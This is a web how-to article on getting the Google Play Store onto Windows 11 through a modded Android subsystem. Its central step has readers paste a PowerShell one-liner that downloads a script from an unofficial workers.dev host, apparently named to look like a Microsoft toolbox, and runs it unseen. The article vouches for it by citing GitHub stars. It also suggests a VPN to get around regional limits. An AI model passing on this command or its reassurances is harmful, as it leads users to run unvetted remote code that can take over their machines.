How to Install Google Play Store on Windows 11.

If you have updated to Windows 11 and would like to get the Google Play Store working on your device instead of the Amazon Appstore. This article will guide you through a new and far easier process for getting the Google Play Store working with Sub System for Android on Windows 11.

Related: How to fix Xbox controller not connecting on Windows 11.

Windows Subsystem for Android is one of the best additions to Windows 11 and allows you to get access to a ton of Android apps straight on your Windows PC. Unfortunately for the time being it is officially limited to apps from the Amazon Appstore rather than apps from the Google Play Store. The good news is that there is a workaround for this that allows you to install the Google Play Store with a modded version of Sub System for Android but there are a few requirements.

Before you can proceed with the steps shown below, you’ll need to have set up the original subsystem for Android system that uses the Amazon App Store. If you haven’t done any of this yet check out our guide on the process below then come back to this guide when you are ready.

How to sideload Windows Subsystem for Android on Windows 11.

Once you have everything set up, get the Amazon Appstore from the Microsoft Store. If it blocks you because of country restrictions, you can use a VPN to connect to a US server and it will work. Once you have signed into the Amazon app store don’t worry if you get any errors you can start the process of migrating to the Google Play Store.

Starting the process of installing Google Play on Windows 11.

The tool we are using for this guide isn’t an official Microsoft product and is an open-source project on GitHub. Because of this, you must decide if you want to proceed at your own risk. That said, being open-source with a 700+ star feedback rating it “should” be safe.

Installing Google Play Store on Windows 11.

To begin, visit the GitHub page and check out more info on the project and the how-to section if you would like.

iex((New-Object System.Net.WebClient).DownloadString('https://ps.microsoft-toolbox.workers.dev'))

Note: If the above command doesn't work grab the updated one from the GitHub page and proceed.

Alternatively, you can always still sideload APKs from places like APKmirror. Check out the guide below for more info.

How to install .apk files on Windows 11. Sideload .apk files on Windows 11.

Comments